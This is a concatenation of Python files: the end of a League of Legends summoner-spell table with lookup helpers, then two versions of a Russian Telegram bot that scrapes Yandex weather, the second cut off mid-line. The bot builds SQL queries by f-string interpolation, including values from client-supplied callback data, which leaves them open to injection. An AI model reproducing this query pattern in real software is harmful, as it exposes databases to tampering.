'id': 21, 'description': 'Shields your champion for 115-455 (depending on champion level) for 2 seconds.', 'name': 'Barrier'}, 'SummonerExhaust': {'summonerLevel': 4, 'key': 'SummonerExhaust', 'id': 3, 'description': 'Exhausts target enemy champion, reducing their Movement Speed and Attack Speed by 30%, their Armor and Magic Resist by 10, and their damage dealt by 40% for 2.5 seconds.', 'name': 'Exhaust'}, 'SummonerOdinGarrison': {'summonerLevel': 1, 'key': 'SummonerOdinGarrison', 'id': 17, 'description': 'Allied Turret: Grants massive regeneration for 8 seconds. Enemy Turret: Reduces damage dealt by 80% for 8 seconds.', 'name': 'Garrison'}, 'SummonerHeal': {'summonerLevel': 1, 'key': 'SummonerHeal', 'id': 7, 'description': 'Restores 90-345 Health (depending on champion level) and grants 30% Movement Speed for 1 second to you and target allied champion. This healing is halved for units recently affected by Summoner Heal.', 'name': 'Heal'}, 'SummonerHaste': {'summonerLevel': 1, 'key': 'SummonerHaste', 'id': 6, 'description': 'Your champion can move through units and has 27% increased Movement Speed for 10 seconds.', 'name': 'Ghost'}, 'SummonerDot': {'summonerLevel': 10, 'key': 'SummonerDot', 'id': 14, 'description': 'Ignites target enemy champion, dealing 70-410 true damage (depending on champion level) over 5 seconds, grants you vision of the target, and reduces healing effects on them for the duration.', 'name': 'Ignite'}, 'SummonerPoroThrow': {'summonerLevel': 1, 'key': 'SummonerPoroThrow', 'id': 31, 'description': 'Toss a Poro at your enemies. If it hits, you can quickly travel to your target as a follow up.', 'name': 'Poro Toss'}, 'SummonerClairvoyance': {'summonerLevel': 8, 'key': 'SummonerClairvoyance', 'id': 2, 'description': 'Reveals a small area of the map for your team for 5 seconds.', 'name': 'Clairvoyance'}, 'SummonerMana': {'summonerLevel': 1, 'key': 'SummonerMana', 'id': 13, 'description': "Restores 40% of your champion's maximum Mana. Also restores allies for 40% of their maximum Mana.", 'name': 'Clarity'}, 'SummonerPoroRecall': {'summonerLevel': 1, 'key': 'SummonerPoroRecall', 'id': 30, 'description': "Quickly travel to the Poro King's side.", 'name': 'To the King!'}, 'SummonerFlash': {'summonerLevel': 8, 'key': 'SummonerFlash', 'id': 4, 'description': "Teleports your champion a short distance toward your cursor's location.", 'name': 'Flash'}, 'SummonerTeleport': {'summonerLevel': 6, 'key': 'SummonerTeleport', 'id': 12, 'description': 'After channeling for 3.5 seconds, teleports your champion to target allied structure, minion, or ward.', 'name': 'Teleport'}, 'SummonerSmite': {'summonerLevel': 10, 'key': 'SummonerSmite', 'id': 11, 'description': 'Deals 390-1000 true damage (depending on champion level) to target epic or large monster or enemy minion.', 'name': 'Smite'}, 'SummonerSnowball': {'summonerLevel': 1, 'key': 'SummonerSnowball', 'id': 32, 'description': 'Throw a snowball in a straight line at your enemies. If it hits an enemy, they become marked and your champion can quickly travel to the marked target as a follow up.', 'name': 'Mark'}} def get_champion(id): for c in champions: if c['id'] == id: return c return def get_champion_name(id): for c in champions: if int(c['id']) == int(id): return c['key'] return def get_spell(id): for s in summoner_spells: if summoner_spells[s]['id'] == id: return s return def get_spell_name(id): for s in summoner_spells: if int(summoner_spells[s]['id']) == int(id): return summoner_spells[s]['key'] return
import config_tb from config_db import config import requests from datetime import datetime from bs4 import BeautifulSoup import telebot from db import UseDataBase from emoji import * # заглавная страница сервиса Яндекс.Погода с прогнозом # по текущему месту положения URL = 'https://yandex.ru/pogoda/' # список регионов России URL_REGIONS = 'https://yandex.ru/pogoda/region/225?via=reg' # ссылка на конкретный регион URL_REGION = None class Var(): def __init__(self): # первая буква из названия региона self.btn = None # первая буква из субъекта региона self.btn_sub_reg = None # список регионов или их субъектов self.regions = None users_property = {} bot = telebot.TeleBot(config_tb.TOKEN) @bot.message_handler(commands=['start']) def welcome(message): users_property[message.chat.id] = Var() with UseDataBase(config) as cursor: query = f""" INSERT INTO users_property ( chat_id, url, url_region ) VALUES ( {message.chat.id}, '{URL}', '{URL_REGION}' ) ON CONFLICT(chat_id) DO NOTHING; """ cursor.execute(query) bot.send_message( message.chat.id, ( 'Привет! Я помогу тебе узнать прогноз погоды.\n' 'Чтобы посмотреть данные о погоде на текущий момент ' '/weather_now.\n' 'Посмотреть подробный прогноз на сегодня ' '/weather_today.\n' 'Посмотреть прогноз погоды на 10 дней /10_day_forecast.\n' 'Выбрать местоположение /select_city_or_area.\n' 'Получить помощь /help.\n' f'Текущее местоположение: {start_area()}' ) ) @bot.message_handler(commands=['help']) def help(message): bot.send_message( message.chat.id, ( '1) Посмотреть погоду на текущий момент /weather_now.\n' '2) Посмотреть подробный прогноз на сегодня ' '/weather_today.\n' '3) Посмотреть прогноз погоды на 10 дней /10_day_forecast.\n' '4) Нажми «Обновить», чтобы получить обновленную информацию о' ' погоде.\n' '5) Для смены региона в прогнозе погоды /location_selection.\n' '6) Бот поддерживает встроенный режим. Введи <yournameforthebot>' ' в любом чате и выбери команду для составления прогноза погоды.' ), # добавьте по желанию ## reply_markup=button( ## text='Связаться с разработчиком', ## ## ## url='telegram.me/<yourrandomdeveloper>' ## ) ) @bot.message_handler(commands=['weather_now']) def current_weather(message): bot.send_chat_action(message.chat.id, 'typing') bot.send_message( message.chat.id, set_message(get_urls('url', message.chat.id)), parse_mode='html', reply_markup=button( text='Обновить', callback_data='update_current', switch_inline_query='Current' ) ) @bot.message_handler(commands=['weather_today']) def weather_today(message): bot.send_chat_action(message.chat.id, 'typing') bot.send_message( message.chat.id, set_today_message(get_urls('url', message.chat.id)), parse_mode='html', reply_markup=button( text='Обновить', callback_data='update_today', switch_inline_query='Today' ) ) @bot.message_handler(commands=['10_day_forecast']) def ten_day_weather(message): bot.send_chat_action(message.chat.id, 'typing') bot.send_message( message.chat.id, set_message_10_day(get_urls('url', message.chat.id)), parse_mode='html', reply_markup=button( text='Обновить', callback_data='update_10_day', switch_inline_query='10 day' ) ) def start_area(): soup = scraping(URL) area = soup.find('ol', 'breadcrumbs__list') country, region, area = area.find_all('span', 'breadcrumbs__title') return f'{country.text} > {region.text} > {area.text}' @bot.message_handler(commands=['select_city_or_area']) def location_selection(message): users_property[message.chat.id] = Var() bot.send_chat_action(message.chat.id, 'typing') keyboard = alphabet( URL_REGIONS, 'set_region' ) bot.send_message( message.chat.id, 'Выберите первый символ из названия региона РФ', reply_markup=keyboard ) @bot.callback_query_handler(func=lambda call: call.data.startswith('update')) def weather_callback(query): bot.answer_callback_query(query.id) if query.message: bot.send_chat_action(query.message.chat.id, 'typing') if query.data == 'update_current': bot.edit_message_text( set_message( get_urls( 'url', query.message.chat.id ), True ), query.message.chat.id, query.message.message_id, parse_mode='HTML' ) bot.edit_message_reply_markup( query.message.chat.id, query.message.message_id, reply_markup=button( text='Обновить', callback_data='update_current', switch_inline_query='Current' ) ) elif query.data == 'update_10_day': bot.edit_message_text( set_message_10_day( get_urls( 'url', query.message.chat.id ), True ), query.message.chat.id, query.message.message_id, parse_mode='HTML' ) bot.edit_message_reply_markup( query.message.chat.id, query.message.message_id, reply_markup=button( text='Обновить', callback_data='update_10_day', switch_inline_query='10 day' ) ) elif query.data == 'update_today': bot.edit_message_text( set_today_message( get_urls( 'url', query.message.chat.id ), True ), query.message.chat.id, query.message.message_id, parse_mode='HTML' ) bot.edit_message_reply_markup( query.message.chat.id, query.message.message_id, reply_markup=button( text='Обновить', callback_data='update_today', switch_inline_query='Today' ) ) elif query.inline_message_id: bot.send_chat_action(query.from_user.id, 'typing') if query.data == 'update_current': bot.edit_message_text( set_message( get_urls( 'url', query.from_user.id ), True ), inline_message_id=query.inline_message_id, parse_mode='HTML' ) bot.edit_message_reply_markup( inline_message_id=query.inline_message_id, reply_markup=button( text='Обновить', callback_data='update_current', switch_inline_query='Current' ) ) elif query.data == 'update_10_day': bot.edit_message_text( set_message_10_day( get_urls( 'url', query.from_user.id ), True ), inline_message_id=query.inline_message_id, parse_mode='HTML' ) bot.edit_message_reply_markup( inline_message_id=query.inline_message_id, reply_markup=button( text='Обновить', callback_data='update_10_day', switch_inline_query='10 day' ) ) elif query.data == 'update_today': bot.edit_message_text( set_today_message( get_urls( 'url', query.from_user.id ), True ), inline_message_id=query.inline_message_id, parse_mode='HTML' ) bot.edit_message_reply_markup( inline_message_id=query.inline_message_id, reply_markup=button( text='Обновить', callback_data='update_today', switch_inline_query='Today' ) ) @bot.callback_query_handler(func=lambda call: True) def location_query(query): if query.message.chat.id not in users_property: users_property[query.message.chat.id] = Var() user = users_property[query.message.chat.id] bot.answer_callback_query(query.id) try: if query.data == 'set_location_back': keyboard = alphabet( URL_REGIONS, 'set_region' ) bot.edit_message_text( 'Выберите первый символ из названия региона РФ', query.message.chat.id, query.message.message_id ) elif query.data.startswith('set_region'): regions = set_region( query.data[-1], URL_REGIONS ) keyboard = telebot.types.InlineKeyboardMarkup(2) lst = [ telebot.types.InlineKeyboardButton( regions[region][0], callback_data=( f'set_sub_reg{query.data[-1]}' f'|{regions[region][1]}' ) ) for region in range(len(regions)) ] keyboard.add(*lst) keyboard.add( telebot.types.InlineKeyboardButton( '<<Назад', callback_data='set_location_back' ) ) bot.edit_message_text( 'Выберите регион', query.message.chat.id, query.message.message_id ) elif (query.data.startswith('set_sub_reg') or query.data == 'set_sub_reg_back'): if query.data != 'set_sub_reg_back': btn, value = query.data.split('|') set_urls( 'url_region', value, query.message.chat.id ) user.btn = btn[-1] keyboard = alphabet( get_urls( 'url_region', query.message.chat.id ), 'main_sub_reg' ) keyboard.add( telebot.types.InlineKeyboardButton( '<<Назад', callback_data=f'set_region{user.btn}' ) ) bot.edit_message_text( 'Выберите первый символ из названия субъекта региона', query.message.chat.id, query.message.message_id ) elif query.data.startswith('main_sub_reg'): if query.data != 'main_sub_reg_back': user.btn_sub_reg = query.data[-1] url_region = get_urls('url_region', query.message.chat.id) user.regions = set_region(user.btn_sub_reg, url_region) keyboard = telebot.types.InlineKeyboardMarkup(2) lst = [ telebot.types.InlineKeyboardButton( user.regions[region][0], callback_data=f'current|{user.regions[region][0][:12]}' ) for region in range(len(user.regions)) ] keyboard.add(*lst) keyboard.add( telebot.types.InlineKeyboardButton( '<<Назад', callback_data='set_sub_reg_back' ) ) bot.edit_message_text( 'Выберите место', query.message.chat.id, query.message.message_id ) elif query.data.startswith('current'): key = query.data.split("|")[1] regions = dict(user.regions) sub_reg = [ (region, regions[region]) for region in regions.keys() if region.startswith(key) ] set_urls( 'url', sub_reg[0][1], query.message.chat.id ) keyboard = telebot.types.InlineKeyboardMarkup() keyboard.row( telebot.types.InlineKeyboardButton( '<<Назад', callback_data='main_sub_reg_back' ) ) bot.edit_message_text( f'Вы выбрали "{sub_reg[0][0]}" локацией по умолчанию.', query.message.chat.id, query.message.message_id ) except TypeError: keyboard = alphabet( URL_REGIONS, 'set_region' ) bot.edit_message_text( 'Выберите первый символ из названия региона РФ', query.message.chat.id, query.message.message_id ) bot.edit_message_reply_markup( query.message.chat.id, query.message.message_id, reply_markup=keyboard ) def scraping(url: str): html = requests.get(url) soup = BeautifulSoup(html.text, 'lxml') return soup def set_message(url, change: bool = False): soup = scraping(url) sub_reg = soup.find('h1').text area = soup.find('ol', 'breadcrumbs__list') region = area.find_all('span', 'breadcrumbs__title')[1].text weather_value = soup.find_all('div', 'term__value') condition = soup.find('div', 'link__condition day-anchor i-bem').text time = soup.find('time') current_time = time.text tz = time.get('datetime') time_of_day = int((tz.strip(". ").split(' ')[1].split(':')[0])) weather_value = [item.text for item in weather_value] try: wind = wind_dir[(weather_value[2].split("м/с, ")[1])] except IndexError: wind = '' if change is True: update = '<i>(Обновлено)</i>\n' else: update = '' sun_card = soup.find('div', 'sun-card__text-info') for v, item in enumerate(sun_card): if v == 2: magnetic_field = item elif v == 4: uv_index = item return ( f'{sub_reg}\n(<i>{region}</i>)\n' f'{update}\n' f'{current_time.strip('. ')}(МСК{time_zone(tz)})\n' f'текущая температура {''.join([weather_value[0], '°'])}\n' f'ощущается как {''.join([weather_value[1], '°'])}\n' f'{condition} {get_weather_emoji(condition, time_of_day)}\n' f'{dashing_away} {weather_value[2]}' f'{wind}\n' f'{droplet} {weather_value[3]} ' f'{barometer} {weather_value[4]}\n' f'{uv_index}\n' f'{magnetic_field}' ) def set_today_message(url, change=None): url = url.split('?')[0] + '/details' soup = scraping(url) area = soup.find('nav', 'breadcrumbs') region, city = area.find_all('span', 'breadcrumbs__title')[1:3] data = soup.find('div', 'card') fields_val = soup.find_all('dd', 'forecast-fields__value')[:2] uv_index, magnetic_field = [item.text for item in fields_val] today = data.find( 'h2', 'forecast-details__title' ) day = today.find('strong').text month = today.find('span').text table = data.find_all( 'tr', 'weather-table__row' ) rows = [] if change is True: update = '<i>(Обновлено)</i>\n' else: update = '' for val in table: daypart = val.find( 'div', 'weather-table__daypart' ).text # температура, прогнозируемая на определенную часть суток # и как она ощущается temp = val.find_all( 'span', 'temp__value temp__value_with-unit' ) temp = [t.text for t in temp] condition = val.find( 'td', 'weather-table__body-cell weather-table__body-cell_type_condition' ).text pressure = val.find( 'td', ( 'weather-table__body-cell weather-table__body-cell_type_air-' 'pressure' ) ).text humidity = val.find( 'td', 'weather-table__body-cell weather-table__body-cell_type_humidity' ).text wind_speed = val.find('span', 'wind-speed').text direct = val.find('abbr').text rows.append( { 'daypart': daypart, 'temp': temp, 'condition': condition, 'pressure': pressure, 'humidity': humidity, 'wind_speed': wind_speed, 'direct': direct } ) mes = [ ' '.join ( [ i["daypart"].capitalize(), ( i["temp"][0] + '°' + '...' + i["temp"][1] + '°' ), '\n', i["condition"], get_weather_emoji( i["condition"], i["daypart"] ), '\n', barometer, i["pressure"], droplet, i["humidity"], dashing_away, i["wind_speed"], i["direct"], wind_dir[i["direct"]], '\n', 'ощущается как', (i["temp"][2] + '°'), '\n\n' ] ) for i in rows ] return ( f'Cегодня {day} {month}\n' f'{city.text}\n<i>({region.text})</i>\n' f'{update}\n' f'{''.join(mes)}' f'УФ-индекс {uv_index}\n' f'Магнитное поле {magnetic_field}' ) def set_message_10_day(url, change: bool = False): soup = scraping(url) sub_reg = soup.find( 'h1', class_='title title_level_1 header-title__title' ).text area = soup.find('ol', 'breadcrumbs__list') region = area.find_all('span', 'breadcrumbs__title')[1].text ten_day = soup.find_all('div', 'forecast-briefly__name') time = soup.find_all('time', class_='forecast-briefly__date') t_day = soup.find_all( 'div', class_='temp forecast-briefly__temp forecast-briefly__temp_day' ) t_night = soup.find_all( 'div', class_='temp forecast-briefly__temp forecast-briefly__temp_night' ) condition = soup.find_all('div', class_='forecast-briefly__condition') if change is True: update = '<i>(Обновлено)</i>\n' else: update = '' mes = [ ' '.join( [ ten_day[i].text, time[i].text, ( '\n' + t_day[i].text + '°' ), ( ', ' + t_night[i].text + '°' ) ] ) + f'\n {condition[i].text}' + f' {get_weather_emoji(condition[i].text)}' + '\n\n' for i in range(2, 12) ] return ( f'{sub_reg}' f'\n<i>({region})</i>' '\nПрогноз на 10 дней\n' f'{update}\n' f'{''.join(mes)}' ) def set_urls(url, value, chat_id): with UseDataBase(config) as cursor: operation = f""" UPDATE users_property SET {url} = '{value}' WHERE chat_id = {chat_id}; """ cursor.execute(operation) def get_urls(url, chat_id): with UseDataBase(config) as cursor: operation = f""" SELECT {url} FROM users_property WHERE chat_id = {chat_id}; """ cursor.execute(operation) result = cursor.fetchall() return result[0][0] def alphabet(url, choosing_region): alphabet = scraping(url) alphabet = alphabet.find_all( 'h2', 'title title_level_2 place-list__letter' ) alphabet = [i.get_text() for i in alphabet] keyboard = keyboard_rows(alphabet, choosing_region) return keyboard def keyboard_rows(data, choosing_region): keyboard = telebot.types.InlineKeyboardMarkup(row_width=4) lst = [ telebot.types.InlineKeyboardButton( data[btn], callback_data=f'{choosing_region + data[btn]}' ) for btn in range(len(data)) ] keyboard.add(*lst) return keyboard def set_region(letter, url): regions = get_location(url) regions = [ (region, regions[region]) for region in regions.keys() if region.startswith(letter) ] return regions def get_location(url): soup = scraping(url) soup = soup.find_all( 'li', 'place-list__item place-list__item_region_yes' ) names = [name.get_text() for name in soup] links = [ 'https://yandex.ru' + link.find('a').get('href') for link in soup ] regions = dict(zip(names, links)) return regions def time_zone(tz): tz = int(tz.split('+')[1][:2]) - 3 if tz > 0: tz = '+' + str(tz) elif tz == 0: tz = '' else: tz = '-' + str(tz) return tz def button(text: str, url: str = None, callback_data: str = None, switch_inline_query: str = None): keyboard = telebot.types.InlineKeyboardMarkup() first_btn = telebot.types.InlineKeyboardButton( text, url, callback_data ) if switch_inline_query: keyboard.row( first_btn, telebot.types.InlineKeyboardButton( text='Поделиться', switch_inline_query=switch_inline_query ) ) else: keyboard.add(first_btn) return keyboard def get_weather_emoji(value, hour=None): value = value.lower() try: if hour is not None: # яндекс считает ночным временем с 0 ч. по 6 ч. if isinstance(hour, str): if hour == 'ночью': hour = 3 # для удобства получения emoji выбрано это время if isinstance(hour, int): if hour < 6: return weather_conditions_night[value] return weather_conditions[value] except KeyError as err: with open('report_emoji.txt', 'a') as file: print(f'KeyError get_weather_emoji: {err}', file=file) return '' @bot.inline_handler(func=lambda query: True) def inline_mode(inline_query): current = telebot.types.InlineQueryResultArticle( '1', 'Current', telebot.types.InputTextMessageContent( set_message( get_urls( 'url', inline_query.from_user.id ) ) ), reply_markup=button( text='Обновить', callback_data='update_current', switch_inline_query='Current' ), description='Погода сейчас', thumb_url=( 'https://www.clipartkey.com/mpngs/m/273-2739384_weather' '-icon-heart.png' ) ) ten_day = telebot.types.InlineQueryResultArticle( '3', '10 day', telebot.types.InputTextMessageContent( set_message_10_day( get_urls( 'url', inline_query.from_user.id ) ) ), reply_markup=button( text='Обновить', callback_data='update_10_day', switch_inline_query='10 day' ), description='Прогноз на 10 дней', thumb_url=( 'https://unblast.com/wp-content/uploads/2020/05/Weather-' 'Vector-Icons-1536x1152.jpg' ) ) today = telebot.types.InlineQueryResultArticle( '2', 'Today', telebot.types.InputTextMessageContent( set_today_message( get_urls( 'url', inline_query.from_user.id ) ) ), reply_markup=button( text='Обновить', callback_data='update_today', switch_inline_query='Today' ), description='Прогноз на сегодня', thumb_url=( 'https://www.clipartkey.com/mpngs/m/273-2739384_weather' '-icon-heart.png' ) ) bot.answer_inline_query( inline_query.id, [current, today, ten_day] ) if __name__ == '__main__': bot.polling(none_stop=True)
import config_tb from config_db import config import requests from datetime import datetime from bs4 import BeautifulSoup import telebot from db import UseDataBase from emoji import * # заглавная страница сервиса Яндекс.Погода с прогнозом # по текущему месту положения URL = 'https://yandex.ru/pogoda/' # список регионов России URL_REGIONS = 'https://yandex.ru/pogoda/region/225?via=reg' # ссылка на конкретный регион URL_REGION = None class Var(): def __init__(self): # первая буква из названия региона self.btn = None # первая буква из субъекта региона self.btn_sub_reg = None # список регионов или их субъектов self.regions = None users_property = {} bot = telebot.TeleBot(config_tb.TOKEN) @bot.message_handler(commands=['start']) def welcome(message): users_property[message.chat.id] = Var() with UseDataBase(config) as cursor: query = f""" INSERT INTO users_property ( chat_id, url, url_region ) VALUES ( {message.chat.id}, '{URL}', '{URL_REGION}' ) ON CONFLICT(chat_id) DO NOTHING; """ cursor.execute(query) bot.send_message( message.chat.id, ( 'Привет! Я помогу тебе узнать прогноз погоды.\n' 'Чтобы посмотреть данные о погоде на текущий момент ' '/weather_now.\n' 'Посмотреть подробный прогноз на сегодня ' '/weather_today.\n' 'Посмотреть прогноз погоды на 10 дней /10_day_forecast.\n' 'Выбрать местоположение /select_city_or_area.\n' 'Получить помощь /help.\n' f'Текущее местоположение: {start_area()}' ) ) @bot.message_handler(commands=['help']) def help(message): bot.send_message( message.chat.id, ( '1) Посмотреть погоду на текущий момент /weather_now.\n' '2) Посмотреть подробный прогноз на сегодня ' '/weather_today.\n' '3) Посмотреть прогноз погоды на 10 дней /10_day_forecast.\n' '4) Нажми «Обновить», чтобы получить обновленную информацию о' ' погоде.\n' '5) Для смены региона в прогнозе погоды /location_selection.\n' '6) Бот поддерживает встроенный режим. Введи <yournameforthebot>' ' в любом чате и выбери команду для составления прогноза погоды.' ), # добавьте по желанию ## reply_markup=button( ## text='Связаться с разработчиком', ## ## ## url='telegram.me/<yourrandomdeveloper>' ## ) ) @bot.message_handler(commands=['weather_now']) def current_weather(message): bot.send_chat_action(message.chat.id, 'typing') bot.send_message( message.chat.id, set_message(get_urls('url', message.chat.id)), parse_mode='html', reply_markup=button( text='Обновить', callback_data='update_current', switch_inline_query='Current' ) ) @bot.message_handler(commands=['weather_today']) def weather_today(message): bot.send_chat_action(message.chat.id, 'typing') bot.send_message( message.chat.id, set_today_message(get_urls('url', message.chat.id)), parse_mode='html', reply_markup=button( text='Обновить', callback_data='update_today', switch_inline_query='Today' ) ) @bot.message_handler(commands=['10_day_forecast']) def ten_day_weather(message): bot.send_chat_action(message.chat.id, 'typing') bot.send_message( message.chat.id, set_message_10_day(get_urls('url', message.chat.id)), parse_mode='html', reply_markup=button( text='Обновить', callback_data='update_10_day', switch_inline_query='10 day' ) ) def start_area(): soup = scraping(URL) area = soup.find('ol', 'breadcrumbs__list') country, region, area = area.find_all('span', 'breadcrumbs__title') return f'{country.text} > {region.text} > {area.text}' @bot.message_handler(commands=['select_city_or_area']) def location_selection(message): users_property[message.chat.id] = Var() bot.send_chat_action(message.chat.id, 'typing') keyboard = alphabet( URL_REGIONS, 'set_region' ) bot.send_message( message.chat.id, 'Выберите первый символ из названия региона РФ', reply_markup=keyboard ) @bot.callback_query_handler(func=lambda call: call.data.startswith('update')) def weather_callback(query): bot.answer_callback_query(query.id) if query.message: bot.send_chat_action(query.message.chat.id, 'typing') if query.data == 'update_current': bot.edit_message_text( set_message( get_urls( 'url', query.message.chat.id ), True ), query.message.chat.id, query.message.message_id, parse_mode='HTML' ) bot.edit_message_reply_markup( query.message.chat.id, query.message.message_id, reply_markup=button( text='Обновить', callback_data='update_current', switch_inline_query='Current' ) ) elif query.data == 'update_10_day': bot.edit_message_text( set_message_10_day( get_urls( 'url', query.message.chat.id ), True ), query.message.chat.id, query.message.message_id, parse_mode='HTML' ) bot.edit_message_reply_markup( query.message.chat.id, query.message.message_id, reply_markup=button( text='Обновить', callback_data='update_10_day', switch_inline_query='10 day' ) ) elif query.data == 'update_today': bot.edit_message_text( set_today_message( get_urls( 'url', query.message.chat.id ), True ), query.message.chat.id, query.message.message_id, parse_mode='HTML' ) bot.edit_message_reply_markup( query.message.chat.id, query.message.message_id, reply_markup=button( text='Обновить', callback_data='update_today', switch_inline_query='Today' ) ) elif query.inline_message_id: bot.send_chat_action(query.from_user.id, 'typing') if query.data == 'update_current': bot.edit_message_text( set_message( get_urls( 'url', query.from_user.id ), True ), inline_message_id=query.inline_message_id, parse_mode='HTML' ) bot.edit_message_reply_markup( inline_message_id=query.inline_message_id, reply_markup=button( text='Обновить', callback_data='update_current', switch_inline_query='Current' ) ) elif query.data == 'update_10_day': bot.edit_message_text( set_message_10_day( get_urls( 'url', query.from_user.id ), True ), inline_message_id=query.inline_message_id, parse_mode='HTML' ) bot.edit_message_reply_markup( inline_message_id=query.inline_message_id, reply_markup=button( text='Обновить', callback_data='update_10_day', switch_inline_query='10 day' ) ) elif query.data == 'update_today': bot.edit_message_text( set_today_message( get_urls( 'url', query.from_user.id ), True ), inline_message_id=query.inline_message_id, parse_mode='HTML' ) bot.edit_message_reply_markup( inline_message_id=query.inline_message_id, reply_markup=button( text='Обновить', callback_data='update_today', switch_inline_query='Today' ) ) @bot.callback_query_handler(func=lambda call: True) def location_query(query): if query.message.chat.id not in users_property: users_property[query.message.chat.id] = Var() user = users_property[query.message.chat.id] bot.answer_callback_query(query.id) try: if query.data == 'set_location_back': keyboard = alphabet( URL_REGIONS, 'set_region' ) bot.edit_message_text( 'Выберите первый символ из названия региона РФ', query.message.chat.id, query.message.message_id ) elif query.data.startswith('set_region'): regions = set_region( query.data[-1], URL_REGIONS ) keyboard = telebot.types.InlineKeyboardMarkup(2) lst = [ telebot.types.InlineKeyboardButton( regions[region][0], callback_data=( f'set_sub_reg{query.data[-1]}' f'|{regions[region][1]}' ) ) for region in range(len(regions)) ] keyboard.add(*lst) keyboard.add( telebot.types.InlineKeyboardButton( '<<Назад', callback_data='set_location_back' ) ) bot.edit_message_text( 'Выберите регион', query.message.chat.id, query.message.message_id ) elif (query.data.startswith('set_sub_reg') or query.data == 'set_sub_reg_back'): if query.data != 'set_sub_reg_back': btn, value = query.data.split('|') set_urls( 'url_region', value, query.message.chat.id ) user.btn = btn[-1] keyboard = alphabet( get_urls( 'url_region', query.message.chat.id ), 'main_sub_reg' ) keyboard.add( telebot.types.InlineKeyboardButton( '<<Назад', callback_data=f'set_region{user.btn}' ) ) bot.edit_message_text( 'Выберите первый символ из названия субъекта региона', query.message.chat.id, query.message.message_id ) elif query.data.startswith('main_sub_reg'): if query.data != 'main_sub_reg_back': user.btn_sub_reg = query.data[-1] url_region = get_urls('url_region', query.message.chat.id) user.regions = set_region(user.btn_sub_reg, url_region) keyboard = telebot.types.InlineKeyboardMarkup(2) lst = [ telebot.types.InlineKeyboardButton( user.regions[region][0], callback_data=f'current|{user.regions[region][0][:12]}' ) for region in range(len(user.regions)) ] keyboard.add(*lst) keyboard.add( telebot.types.InlineKeyboardButton( '<<Назад', callback_data='set_sub_reg_back' ) ) bot.edit_message_text( 'Выберите место', query.message.chat.id, query.message.message_id ) elif query.data.startswith('current'): key = query.data.split("|")[1] regions = dict(user.regions) sub_reg = [ (region, regions[region]) for region in regions.keys() if region.startswith(key) ] set_urls( 'url', sub_reg[0][1], query.message.chat.id ) keyboard = telebot.types.InlineKeyboardMarkup() keyboard.row( telebot.types.InlineKeyboardButton( '<<Назад', callback_data='main_sub_reg_back' ) ) bot.edit_message_text( f'Вы выбрали "{sub_reg[0][0]}" локацией по умолчанию.', query.message.chat.id, query.message.message_id ) except TypeError: keyboard = alphabet( URL_REGIONS, 'set_region' ) bot.edit_message_text( 'Выберите первый символ из названия региона РФ', query.message.chat.id, query.message.message_id ) bot.edit_message_reply_markup( query.message.chat.id, query.message.message_id, reply_markup=keyboard ) def scraping(url: str): html = requests.get(url) soup = BeautifulSoup(html.text, 'lxml') return soup def set_message(url, change: bool = False): soup = scraping(url) sub_reg = soup.find('h1').text area = soup.find('ol', 'breadcrumbs__list') region = area.find_all('span', 'breadcrumbs__title')[1].text weather_value = soup.find_all('div', 'term__value') condition = soup.find('div', 'link__condition day-anchor i-bem').text time = soup.find('time') current_time = time.text tz = time.get('datetime') time_of_day = int((tz.strip(". ").split(' ')[1].split(':')[0])) weather_value = [item.text for item in weather_value] try: wind = wind_dir[(weather_value[2].split("м/с, ")[1])] except IndexError: wind = '' if change is True: update = '<i>(Обновлено)</i>\n' else: update = '' sun_card = soup.find('div', 'sun-card__text-info') for v, item in enumerate(sun_card): if v == 2: magnetic_field = item elif v == 4: uv_index = item return ( f'{sub_reg}\n(<i>{region}</i>)\n' f'{update}\n' f'{current_time.strip(". ")}(МСК{time_zone(tz)})\n' f'текущая температура {"".join([weather_value[0], "°"])}\n' f'ощущается как {"".join([weather_value[1], "°"])}\n' f'{condition} {get_weather_emoji(condition, time_of_day)}\n' f'{dashing_away} {weather_value[2]}' f'{wind}\n' f'{droplet} {weather_value[3]} ' f'{barometer} {weather_value[4]}\n' f'{uv_index}\n' f'{magnetic_field}' ) def set_today_message(url, change=None): url = url.split('?')[0] + '/details' soup = scraping(url) area = soup.find('nav', 'breadcrumbs') region, city = area.find_all('span', 'breadcrumbs__title')[1:3] data = soup.find('div', 'card') fields_val = soup.find_all('dd', 'forecast-fields__value')[:2] uv_index, magnetic_field = [item.text for item in fields_val] today = data.find( 'h2', 'forecast-details__title' ) day = today.find('strong').text month = today.find('span').text table = data.find_all( 'tr', 'weather-table__row' ) rows = [] if change is True: update = '<i>(Обновлено)</i>\n' else: update = '' for val in table: daypart = val.find( 'div', 'weather-table__daypart' ).text # температура, прогнозируемая на определенную часть суток # и как она ощущается temp = val.find_all( 'span', 'temp__value temp__value_with-unit' ) temp = [t.text for t in temp] condition = val.find( 'td', 'weather-table__body-cell weather-table__body-cell_type_condition' ).text pressure = val.find( 'td', ( 'weather-table__body-cell weather-table__body-cell_type_air-' 'pressure' ) ).text humidity = val.find( 'td', 'weather-table__body-cell weather-table__body-cell_type_humidity' ).text wind_speed = val.find('span', 'wind-speed').text direct = val.find('abbr').text rows.append( { 'daypart': daypart, 'temp': temp, 'condition': condition, 'pressure': pressure, 'humidity': humidity, 'wind_speed': wind_speed, 'direct': direct } ) mes = [ ' '.join ( [ i["daypart"].capitalize(), ( i["temp"][0] + '°' + '...' + i["temp"][1] + '°' ), '\n', i["condition"], get_weather_emoji( i["condition"], i["daypart"] ), '\n', barometer, i["pressure"], droplet, i["humidity"], dashing_away, i["wind_speed"], i["direct"], wind_dir[i["direct"]], '\n', 'ощущается как', (i["temp"][2] + '°'), '\n\n' ] ) for i in rows ] return ( f'Cегодня {day} {month}\n' f'{city.text}\n<i>({region.text})</i>\n' f'{update}\n' f'{"".join(mes)}' f'УФ-индекс {uv_index}\n' f'Магнитное поле {magnetic_field}' ) def set_message_10_day(url, change: bool = False): soup = scraping(url) sub_reg = soup.find( 'h1', class_='title title_level_1 header-title__title' ).text area = soup.find('ol', 'breadcrumbs__list') region = area.find_all('span', 'breadcrumbs__title')[1].text ten_day = soup.find_all('div', 'forecast-briefly__name') time = soup.find_all('time', class_='forecast-briefly__date') t_day = soup.find_all( 'div', class_='temp forecast-briefly__temp forecast-briefly__temp_day' ) t_night = soup.find_all( 'div', class_='temp forecast-briefly__temp forecast-briefly__temp_night' ) condition = soup.find_all('div', class_='forecast-briefly__condition') if change is True: update = '<i>(Обновлено)</i>\n' else: update = '' mes = [ ' '.join( [ ten_day[i].text, time[i].text, ( '\n' + t_day[i].text + '°' ), ( ', ' + t_night[i].text + '°' ) ] ) + f'\n {condition[i].text}' + f' 